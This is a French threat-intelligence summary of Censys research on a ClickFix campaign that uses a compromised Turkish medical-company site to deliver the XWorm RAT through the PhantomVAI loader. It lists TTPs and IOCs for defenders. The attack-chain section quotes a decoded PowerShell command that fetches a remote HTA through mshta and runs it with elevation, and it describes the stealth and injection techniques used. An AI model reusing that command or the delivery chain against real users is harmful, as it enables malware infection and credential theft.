🔍 Contexte

Publié le 2 avril 2026 par Censys (auteur : Andrew Northern, Principal Security Researcher), cet article présente une découverte CTI issue d’une méthodologie de chasse technique basée sur l’analyse des corps de réponses HTTP à l’échelle d’Internet. La recherche a permis de surface une campagne ClickFix active livrant XWorm V5.6 via le loader MaaS PhantomVAI.

🎯 Vecteur d’entrée et infrastructure compromise

Le point d’entrée est le site d’une entreprise turque de matériel médical, orcanmedikal[.]com[.]tr, dont tous les sous-domaines (naked domain, www, mail) servent une page identique de 1 655 octets intitulée “AntiFraud Authenticator”. Cette page ClickFix invite la victime à cliquer sur un bouton COPY, ce qui copie silencieusement une commande PowerShell encodée dans le presse-papiers via navigator.clipboard.writeText().

⛓️ Chaîne d’attaque en 5 étapes

Étape 1 – ClickFix (ingénierie sociale) : La commande copiée est un powershell -EncodedCommand qui décode en Start-Process mshta.exe https://orcanmedikal[.]com[.]tr/tool.hta -Verb RunAs, utilisant mshta.exe comme LOLBin avec élévation UAC.

Étape 2 – Exécution HTA (tool.hta, 110 Ko) : Fichier HTA obfusqué par séparateurs Unicode emoji intercalés entre chaque caractère. Une fonction passman() reconstruit la commande PowerShell réelle. Un faux code AES-JS (~600 lignes) gonfle le fichier pour tromper l’analyse statique. Exécution cachée via WScript.Shell.Run(cmd, 0, false).

Étape 3 – Récupération du loader par stéganographie : Un script PowerShell télécharge un JPEG 3840×2160 depuis archive[.]org. Le DLL .NET PhantomVAI est encodé en base64 et dissimulé dans les données du fichier image entre les marqueurs BaseStart- et -BaseEnd (à partir de l’offset 1 390 750).

Étape 4 – Exécution du loader PhantomVAI : Le loader Babel-obfusqué effectue : détection VM (VirtualBox, VMware, VirtualPC), téléchargement du payload depuis 4a-m[.]al/ConvertedFile.txt, inversion de la chaîne téléchargée puis décodage base64, injection par process hollowing dans RegAsm.exe via le module RUNPE (Mandark), persistance par tâche planifiée et registre de démarrage.

Étape 5 – XWorm V5.6 (RAT) : Binaire PE32 .NET (SecondDirect.exe, 36 864 octets). Configuration AES-256-ECB chiffrée, clé dérivée de MD5(mutex). C2 : 86.106.85[.]194:9000. Capacités : keylogging, capture webcam, screenshots, vol de credentials, propagation USB, shell distant.

🧪 Analyse statique et récupération de payload

L’intégralité de la récupération du payload a été réalisée sans exécution en sandbox, par décompilation ILSpy (135 953 lignes pour le loader, 2 062 lignes pour XWorm) et analyse statique. La protection du payload se limite à une inversion de chaîne suivie d’un décodage base64, sans opération cryptographique. La configuration XWorm a été extraite par déchiffrement AES-256-ECB avec la clé dérivée du mutex UGUHrsQaOFvrEntr.

🏗️ Infrastructure C2

  • C2 XWorm : 86.106.85[.]194:9000 (AS9009 M247, Manchester, UK), certificat TLS auto-signé CN=WIN-3O8L0TLB135
  • Staging payload : 4a-m[.]al (domaine albanais, actif au moment de l’investigation)
  • Loader stéganographique : archive[.]org (item supprimé/obscurci, récupéré via VirusTotal)

📋 Type d’article

Il s’agit d’une publication de recherche combinant méthodologie de threat hunting et analyse technique approfondie d’une chaîne d’attaque complète, avec extraction exhaustive des IOCs et des artefacts.

🧠 TTPs et IOCs détectés

TTP

  • T1566 — Phishing (Initial Access)
  • T1204.001 — User Execution: Malicious Link (Execution)
  • T1059.001 — Command and Scripting Interpreter: PowerShell (Execution)
  • T1059.005 — Command and Scripting Interpreter: Visual Basic (Execution)
  • T1218.005 — System Binary Proxy Execution: Mshta (Defense Evasion)
  • T1218.009 — System Binary Proxy Execution: Regasm/Regsvcs (Defense Evasion)
  • T1027 — Obfuscated Files or Information (Defense Evasion)
  • T1027.003 — Obfuscated Files or Information: Steganography (Defense Evasion)
  • T1140 — Deobfuscate/Decode Files or Information (Defense Evasion)
  • T1055.012 — Process Injection: Process Hollowing (Defense Evasion)
  • T1497 — Virtualization/Sandbox Evasion (Defense Evasion)
  • T1547.001 — Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Persistence)
  • T1053.005 — Scheduled Task/Job: Scheduled Task (Persistence)
  • T1113 — Screen Capture (Collection)
  • T1056.001 — Input Capture: Keylogging (Collection)
  • T1125 — Video Capture (Collection)
  • T1091 — Replication Through Removable Media (Lateral Movement)
  • T1041 — Exfiltration Over C2 Channel (Exfiltration)
  • T1071.001 — Application Layer Protocol: Web Protocols (Command and Control)
  • T1573 — Encrypted Channel (Command and Control)
  • T1608.001 — Stage Capabilities: Upload Malware (Resource Development)
  • T1102 — Web Service (Command and Control)
  • T1115 — Clipboard Data (Collection)

IOC

  • IPv4 : 86.106.85.194AbuseIPDB · VT · ThreatFox
  • Domaines : orcanmedikal.com.trVT · URLhaus · ThreatFox
  • Domaines : mail.orcanmedikal.com.trVT · URLhaus · ThreatFox
  • Domaines : www.orcanmedikal.com.trVT · URLhaus · ThreatFox
  • Domaines : 4a-m.alVT · URLhaus · ThreatFox
  • URLs : https://orcanmedikal.com.tr/tool.htaURLhaus
  • URLs : https://archive.org/download/optimized_msi_20250904/optimized_MSI.pngURLhaus
  • URLs : https://4a-m.al/ConvertedFile.txtURLhaus
  • SHA256 : 020668f00325631bec2b9c6dd8596d7744e118f68424fdbb28eb2a318f3a7adfVT · MalwareBazaar
  • SHA256 : 656991f4dabe0e5d989be730dac86a2cf294b6b538b08d7db7a0a72f0c6c484bVT · MalwareBazaar
  • SHA256 : adc2f550e7ff2b707a070ffaa50fc367af6a01c037f1f5b347c444cca3c9a650VT · MalwareBazaar
  • SHA256 : 6f67c7441e31d448502050c9783a1032c307946323f29e41a82fb19915c59531VT · MalwareBazaar
  • SHA256 : 7e13561d794f7065e9cb3afc319acc7ac9861b4cf653082c1a11d5cc25a5d1f1VT · MalwareBazaar
  • SHA256 : b67d8db2f53547b4a5b070b736cd93cbdf3ece21109972d54f193e8ede0b584bVT · MalwareBazaar
  • MD5 : 6eecd66ae05253ef93d83ece6b821d8bVT · MalwareBazaar
  • MD5 : 34e90568af4dcd40f4f04174ec326e2aVT · MalwareBazaar
  • MD5 : e013048d6ae5bb1289e36c9742b58934VT · MalwareBazaar
  • MD5 : 46912c7ccc19ec28668f1e2771c37eedVT · MalwareBazaar
  • Fichiers : tool.hta
  • Fichiers : optimized_MSI.png
  • Fichiers : ConvertedFile.txt
  • Fichiers : SecondDirect.exe
  • Fichiers : USB.exe
  • Fichiers : Log.tmp
  • Chemins : C:\Users\Public\Downloads
  • Chemins : \Log.tmp

Malware / Outils

  • XWorm (rat)
  • PhantomVAI (loader)
  • Katz Stealer (stealer)
  • RemcosRAT (rat)
  • AsyncRAT (rat)
  • FormBook (stealer)
  • DCRat (rat)

🟢 Indice de vérification factuelle : 90/100 (haute)

  • ✅ censys.com — source reconnue (Rösti community) (20pts)
  • ✅ 34454 chars — texte complet (fulltext extrait) (15pts)
  • ✅ 26 IOCs dont des hashes (15pts)
  • ✅ 7/10 IOCs confirmés (AbuseIPDB, MalwareBazaar, ThreatFox, URLhaus, VirusTotal) (15pts)
  • ✅ 23 TTPs MITRE identifiées (15pts)
  • ✅ date extraite du HTML source (10pts)
  • ⬜ aucun acteur de menace nommé (0pts)
  • ⬜ pas de CVE à vérifier (0pts)

IOCs confirmés externellement :

  • 86.106.85.194 (ip) → VT (7/94 détections)
  • 020668f00325631b… (sha256) → VT (28/77 détections)
  • 656991f4dabe0e5d… (sha256) → VT (15/77 détections) + ThreatFox (XWorm)
  • adc2f550e7ff2b70… (sha256) → VT (44/77 détections)
  • orcanmedikal.com.tr (domain) → VT (9/94 détections)

🔗 Source originale : https://censys.com/blog/technique-based-approach-hunting-web-delivered-malware/